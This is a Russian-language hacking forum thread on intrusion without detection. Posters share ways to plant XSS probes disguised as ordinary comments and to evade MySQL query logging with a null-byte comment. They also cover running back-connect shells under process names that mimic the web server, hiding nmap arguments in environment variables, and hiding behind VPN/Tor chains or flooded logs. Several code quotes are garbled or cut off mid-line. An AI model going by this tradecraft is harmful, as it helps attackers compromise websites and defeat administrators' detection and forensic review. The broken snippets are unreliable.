PDA

Просмотр полной версии : Учимся незаметному вторжению


XAMEHA
06.01.2013, 11:51
Ещё одна тема по сбору информации, в ней предлагаю обсудить информацию о незаметном вторжении, поиске уязвимостей и т.п.

1. Пред проверкой GET-параметра на уязвимость, следует проверить возможность его использования в POST или COOKIES, и если такая возможность существует, GET параметр не убирать, а к примеру маскироваться под парсер. При эксплуатации уязвимости желательно проверить отсутствие админа на сайте встроенными средствами.

2. XSS:

[QUOTE="None"]
Плохо:
alert('xss');
Хорошо:
В 1-ой теме: Всем привет :"->
В 2-ой теме: В 5-ом пункте ссылка битая :'-alert('xss');
Хорошо:
В 1-ой теме: Всем привет :"->
В 2-ой теме: В 5-ом пункте ссылка битая :'-

XAMEHA
07.01.2013, 18:05
Плагины FireFox, которые будут интересны всем:


Charles XPI
Cookie Whitelist - Включение куков только на нужных нам сайтах
DownloadHelper
Firebug
NoScript
User Agent Switcher
Web Developer


Единственное, чего мне нехватает - выборочное отключение запросов с одного домена на другие сторонние(CSRF GET), для этого дополнения вроде пока нет.

XAMEHA
18.05.2013, 07:35
Спущено.

Strilo4ka
04.08.2014, 08:46
Кто позволил себе удалить последний пост к этой теме?

Еще раз говорю, эти методы бредовые.


Перед проверкой GET-параметра на уязвимость, следует проверить возможность его использования в POST или COOKIES, и если такая возможность существует, GET параметр не убирать, а к примеру маскироваться под парсер


Ага, и спалим саму переменную в уязвимом скрипте(хоть и в гете не эксплуатировалась и никогда не использовалась!) =/

[QUOTE="None"]
Плохо:
alert('xss');
Хорошо:
В 1-ой теме: Всем привет :"->
В 2-ой теме: В 5-ом пункте ссылка битая :'-alert('xss');
Хорошо:
В 1-ой теме: Всем привет :"->
В 2-ой теме: В 5-ом пункте ссылка битая :'-

Strilo4ka
04.08.2014, 08:54
Charles XPI
Cookie Whitelist - Включение куков только на нужных нам сайтах
DownloadHelper
Firebug
NoScript
User Agent Switcher
Web Developer


Как эти платины относятся к данной теме, причем они тут?

nikp
04.08.2014, 09:59
Вообще, да - методы спорные.

Не стал писать, пока тема висела в группах, но спущенная в паблик означает, что группа согласна с этим и делится информацией со всеми. Поэтому прокомментирую.

1 Согласен с первой частью, вторую оспаривать не буду, но и применять тоже не буду.

2 Наверное да.

3 Ничем не лучше, ловится и по сигнатурам и зрительно одинаково подозрительны. Будут смотреть логи, обязательно проверят оба.

4 См. пункт 3.

5 Наверное да, не факт.

6 Хороший совет, на 100% не спасет, даже на 50, но от ленивого админа очень даже может (конечно, если не анализируют взлом, а просто дежурный просмотр логов).

M_script
04.08.2014, 12:24
2 Наверное да.


А вот и нет.

'Всем привет :"->' - это здесь совсем не нужно. Закрытие тега и двойная кавычка для XSS не требуется. Пример (в конце пробел):

[PHP]
[COLOR="#0000BB"][COLOR="#007700"]", поэтому даже если ":'-". Независимо от наличия XSS, этот текст подозрений не вызовет.

Не менее часто разработчики допускают серьезную ошибку, не зацикливая "", вследствие чего "script>alert(xss)" после фильтра превращается в "alert(xss)" и код выполняется.

Мой вариант:

Текст 1: "пошли вы все на" - если прошло, больше проверок не нужно (XSS есть). если не прошло, используем текст 2.

Текст 2: "В 5-ом пункте ссылка битая :-o>любой текст" - в любом случае на странице отобразится только "любой текст", независимо от наличия XSS, и никто ничего не заметит.

M_script
04.08.2014, 12:46
Немного оффтопа, может кому-то будет интересно.

Объясню, почему закрытие тега при XSS не обязательно. К примеру, код:


текст

после предварительной обработки браузером будет выглядеть так:




текст



"" для браузера - это пустой атрибут "", закрывающая тег "a". Так как тег "" после таких преобразований остался открытым, браузер исправляет эту "ошибку программиста" и закрывает самостоятельно, добавляя ""

XAMEHA
04.08.2014, 16:30
M_Script,спасибо за пример.

Конечно не следует воспринимаемость буквально и ВСЕГДА делать именно так.

3. Пункт может быть полезен тогда, когда ведутся логи SQL-запросов (например на уровне приложения).

2. Смешно, кода выкладывают XSS-ки с alert('xss');. Если сайтом занимаются - уязвимость через пару дней исчезает обязательно.

Strilo4ka
04.08.2014, 17:04
M_Script,
спасибо за пример.
Конечно не следует воспринимаемость буквально и ВСЕГДА делать именно так.
3. Пункт может быть полезен тогда, когда ведутся логи SQL-запросов.
2. Смешно, кода выкладывают XSS-ки с
alert('xss');
. Если сайтом занимаются - уязвимость через пару дней исчезает обязательно.


Опять к 3. У Вас какие-то неверные подходы/методы(хз как сказать!). Хитрый запрос в лог файле прокатит если админ тупой. Сама проблема тут остаётся. Тут лучше копать в другую сторону. =/

Пример:

Атакующий может обойти логирование запросов к базе данных.


mysql_query('/*'.chr(0).'*/ SELECT * FROM table');

[B]MySQL

nikp
05.08.2014, 10:54
интересно) правда кто использует такую осторожность - все хотят быстро хекнуть и забыть. Не теряя лишнего времени.


Это правило, которое лучше не нарушать.


интересно)а вот про скуль и лфи не понятно что чем спасает.


Общий смысл таков:

- скрыть атаку в логах, или замаскировать.

- при невозможности скрыть, затруднить анализ проведенных действий, или представить атаку неумелой, бессмысленной.


Пишу потому что тс мне нравится, читая его посты, пишет не от балды


Один из немногих, кто еще занимается исследованиями сам.

И публикует их.

GAiN
19.08.2014, 17:18
спасибо, хорошая статья

достаточно ли одного vpn для маскировки ip или лучше несколько цепочек: тор vpv, анонимайзеры ?

стоит ли лог зафлудить запросами - которые итут от юзеров взломанного сайта ? или лучше рандомизировать в js рандомные что бы были ?

betking
22.09.2014, 20:52
=B]urlencode[/B].


А у вас видео мастер классы есть?

winstrool
25.09.2014, 17:23
А у вас видео мастер классы есть?


Ждите когда он в очередной раз, начнет набирать группу и успевайте занимать места в ней, там вам все будет!)

Unknown
05.02.2015, 08:13
Добавлю от себя. При возможности выполнять команды, не работайте лишний раз в веб-шелле - делайте бекконнекты.

1.Всегда переименовывайте рабочий процесс бек-коннекта. Простенькая утилиты с подменой первого аргумента в exec вам поможет. Процесс переименованный в процесс веб-сервера (или что вы ломаете) намного незаметнее обычного /bin/bash. Порождаемые подпроцессы обычно висят недолго.

2. Старайтесь не использовать лишних аргументов при запуске бинарников.

К примеру nmap умеет читать CMD из переменных окружения.

NMAP_ARGS="127.0.0.1 80-443" nmap

Совмещая с переименовыванием процесса, можно очень тихо работать из шелла.

3. Отвязывайтесь от родительского процесса перед созданием бекконнекта.

Например sh -c 'perl

cLauZ
05.02.2015, 08:51
Тему нужно было назвать: Что такое хорошо и что такое плохо.

Прочитала +

EoGeneo
28.04.2015, 18:28
Эти методы для тупого админа, я бы тему назвал этика хорошего тона